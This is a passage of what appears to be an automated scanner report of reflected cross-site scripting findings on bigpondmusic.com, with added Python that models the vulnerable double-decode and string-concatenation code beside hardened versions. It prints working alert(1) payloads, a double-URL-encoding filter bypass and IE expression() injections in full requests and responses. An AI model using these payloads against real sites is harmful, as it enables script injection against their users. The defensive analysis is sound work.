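double-encoding bypass in the path, and no filtering of the query string.
"""
import html
from html.parser import HTMLParser
from urllib.parse import unquote

HOST = 'bigpondmusic.com'
BLOCKED = ('<', '>', '"')   # assumed blacklist, see module docstring


def server_decode(request_target):
    """Mimic the web server: split the request target and URL-decode each part once."""
    path, _, query = request_target.partition('?')
    return unquote(path), unquote(query)


def vulnerable_parent_url(request_target):
    """Blacklist on the once-decoded path, then a second decode, then raw
    concatenation into a double-quoted attribute. Returns None when the
    blacklist rejects the request."""
    path, query = server_decode(request_target)
    if any(c in path for c in BLOCKED):
        return None
    path = unquote(path)                      # the bug: %253c -> %3c -> <
    url = 'http://%s%s' % (HOST, path) + ('?' + query if query else '')
    return '<input type="hidden" name="parentUrl" value="%s" />' % url


def hardened_parent_url(request_target):
    """Decode once, never re-decode, and HTML-attribute-encode at the output
    point. With the output encoded, this sink no longer needs a blacklist."""
    path, query = server_decode(request_target)
    url = 'http://%s%s' % (HOST, path) + ('?' + query if query else '')
    return '<input type="hidden" name="parentUrl" value="%s" />' % html.escape(url, quote=True)


class _Tags(HTMLParser):
    """Collect start tags and their attributes as a tokenizer would see them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    """Check: which tags and attributes does the emitted markup really contain?"""
    p = _Tags()
    p.feed(markup)
    p.close()
    return p.tags


# Request targets copied from the report (the hex markers are the scanner's own).
DOUBLE_ENCODED = ('/mixtapes81532%2522%253e%253cscript%253ealert%25281%2529'
                  '%253c%252fscript%253e581cc6a8032/my')
SINGLE_ENCODED = '/mixtapes81532%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e581cc6a8032/my'
PARAM_NAME = '/mixtapes/favourites?3d0f8"style%3d"x%3aexpression(alert(1))"dafd2609343=1'

if __name__ == '__main__':
    for target in (SINGLE_ENCODED, DOUBLE_ENCODED, PARAM_NAME):
        print('vulnerable:', vulnerable_parent_url(target))
        print('hardened:  ', hardened_parent_url(target))
        print('tags seen: ', parsed_tags(hardened_parent_url(target)))
```

Run stand-alone, the single-encoded request is rejected, the double-encoded one produces the exact input line shown in entry 2.322 followed by a script tag, and the parameter-name request produces an input tag carrying an extra style attribute. The hardened output keeps every request inside one value attribute, which is the property the remediation text asks for.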

Request

GET /newsc095b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e0bb0bd59/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/newsc095b"><script>alert(1)</script>57e0bb0bd59/" />
...[SNIP]...

2.332. http://bigpondmusic.com/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85c07'%3b03e5bb4ca27 was submitted in the REST URL parameter 1. This input was echoed as 85c07';03e5bb4ca27 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
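Entries 2.321, 2.324, 2.327, 2.329 and 2.332 all show the same sink: a path segment concatenated into the single-quoted s.channel or s.prop4 assignment of the analytics script. Confidence is Firm rather than Certain because the echoed value leaves the tail e9b05043c37'; dangling after the terminated string; the scanner confirmed the break-out but not a complete payload. The Python below is an added example, not the site's code: a constructed copy of that template, a JavaScript string escaper of the kind the remediation text calls for, and a check that each emitted line is still a single string literal.

```python
"""Constructed model of the analytics script shown in the entries above: a
URL path segment lands inside a single-quoted JavaScript string. The template
and the escaper are illustrative; they are not the site's code."""
import re
from urllib.parse import unquote

# Value the server sees for REST URL parameter 1 after its single URL-decode
# (payload copied from entry 2.321; the hex marker is the scanner's own).
PAYLOAD_CHANNEL = unquote("mixtapes14be3'%3be9b05043c37")


def js_string_escape(value):
    """Escape a value for use inside a JavaScript string literal (either quote style).

    Everything outside a small allow-list is emitted as \\xHH, or \\uHHHH above
    U+00FF. That neutralises both quotes and the backslash, '<' and '/' (so a
    '</script>' in the value cannot close the enclosing script block), ';' and
    newlines, and U+2028/U+2029, which older engines treat as line terminators
    even inside string literals.
    """
    out = []
    for ch in value:
        cp = ord(ch)
        if (cp < 128 and ch.isalnum()) or ch in ' .,_-:':
            out.append(ch)
        elif cp < 256:
            out.append('\\x%02x' % cp)
        else:
            out.append('\\u%04x' % cp)
    return ''.join(out)


def render_vulnerable(channel, prop4):
    """The pattern in the report: path segments concatenated raw into the script."""
    return "s.channel = '%s';\ns.prop4 = '%s';" % (channel, prop4)


def render_hardened(channel, prop4):
    """Same template, but every value passes through the escaper at the output point."""
    return "s.channel = '%s';\ns.prop4 = '%s';" % (
        js_string_escape(channel), js_string_escape(prop4))


# One assignment whose right-hand side is exactly one single-quoted literal
# (backslash escapes allowed inside) followed by ';'.
_LITERAL_LINE = re.compile(r"^s\.\w+ = '(?:[^'\\]|\\.)*';$")


def assignments_are_single_literals(script):
    """Check: does each emitted line still parse as one string literal?
    A stray unescaped quote, as in the scanner's echo, fails this test."""
    return all(_LITERAL_LINE.match(line) for line in script.splitlines())


if __name__ == '__main__':
    print(render_vulnerable(PAYLOAD_CHANNEL, 'my'))
    print(render_hardened(PAYLOAD_CHANNEL, 'my'))
```

The vulnerable render reproduces the s.channel line from entry 2.321 verbatim and fails the literal check; the hardened render turns the quote and semicolon into \x27\x3b and passes. Hex escaping rather than backslash-quoting is deliberate: it also covers the closing-script-tag case, which a quote-only escaper misses.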

Request

GET /news85c07'%3b03e5bb4ca27/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87777


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news85c07';03e5bb4ca27';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.333. http://bigpondmusic.com/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ad0"style%3d"x%3aexpression(alert(1))"69678540c8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34ad0"style="x:expression(alert(1))"69678540c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/?34ad0"style%3d"x%3aexpression(alert(1))"69678540c8b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 102008


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Music News - Latest Music Ne
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/?34ad0"style="x:expression(alert(1))"69678540c8b=1" />
...[SNIP]...

2.334. http://bigpondmusic.com/news/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a31"style%3d"x%3aexpression(alert(1))"a7ebc0ba046 was submitted in the ref parameter. This input was echoed as 75a31"style="x:expression(alert(1))"a7ebc0ba046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/?ref=Net-Head-Music-News75a31"style%3d"x%3aexpression(alert(1))"a7ebc0ba046 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 101808


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Music News - Latest Music Ne
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/?ref=Net-Head-Music-News75a31"style="x:expression(alert(1))"a7ebc0ba046" />
...[SNIP]...

2.335. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e92a3'%3b18947b8525a was submitted in the REST URL parameter 1. This input was echoed as e92a3';18947b8525a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newse92a3'%3b18947b8525a/article/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'newse92a3';18947b8525a';
   s.prop4 = 'article';
   s.prop5 = '5074';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.336. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21b5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72f772eb291 was submitted in the REST URL parameter 1. This input was echoed as 21b5d"><script>alert(1)</script>72f772eb291 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news21b5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72f772eb291/article/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88680


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news21b5d"><script>alert(1)</script>72f772eb291/article/5074/chris-brown-s-behaviour-praised-by-judge" />
...[SNIP]...

2.337. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0ebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbaca8239bc was submitted in the REST URL parameter 2. This input was echoed as e0ebc"><script>alert(1)</script>bbaca8239bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/articlee0ebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbaca8239bc/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/articlee0ebc"><script>alert(1)</script>bbaca8239bc/5074/chris-brown-s-behaviour-praised-by-judge" />
...[SNIP]...

2.338. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec078'%3b1458de4a20a was submitted in the REST URL parameter 2. This input was echoed as ec078';1458de4a20a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/articleec078'%3b1458de4a20a/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87917


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'articleec078';1458de4a20a';
   s.prop5 = '5074';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.339. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5157%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e841f430404 was submitted in the REST URL parameter 4. This input was echoed as b5157'style='x:expression(alert(1))'e841f430404 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5074/chris-brown-s-behaviour-praised-by-judgeb5157%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e841f430404 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 117773


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Chris Brown...s behaviour pr
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judgeb5157'style='x:expression(alert(1))'e841f430404' />
...[SNIP]...

2.340. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0fa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee15c2fe88f7 was submitted in the REST URL parameter 4. This input was echoed as 8a0fa"><script>alert(1)</script>e15c2fe88f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5074/chris-brown-s-behaviour-praised-by-judge8a0fa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee15c2fe88f7 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 117764


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
